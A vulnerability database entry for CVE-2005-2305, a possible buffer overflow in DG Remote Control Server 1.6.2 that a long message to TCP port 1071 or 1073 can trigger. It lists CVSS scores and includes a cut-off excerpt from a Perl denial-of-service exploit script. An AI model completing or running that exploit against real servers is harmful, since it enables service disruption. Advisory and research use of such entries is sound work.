7.5
CVSSv2

CVE-2005-2305

Published: 19/07/2005 Updated: 05/09/2008
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

DG Remote Control Server 1.6.2 allows remote malicious users to cause a denial of service (crash or CPU consumption) and possibly execute arbitrary code via a long message to TCP port 1071 or 1073, possibly due to a buffer overflow.

Vulnerable Product Search on Vulmon Subscribe to Product

dg remote control server 1.6.2

Exploits

#!/usr/local/bin/perl # # Remote Control Server DOS Exploit # ------------------------------------ # Infam0us Gr0up - Securiti Research # # # Tested on Windows2000 SP4 (Win NT) # Info: infamous2hellcom # $ARGC=@ARGV; if ($ARGC !=1) { print "\n"; print " Remote Control Server DOS Exploit\n"; print "---------------------------------- ...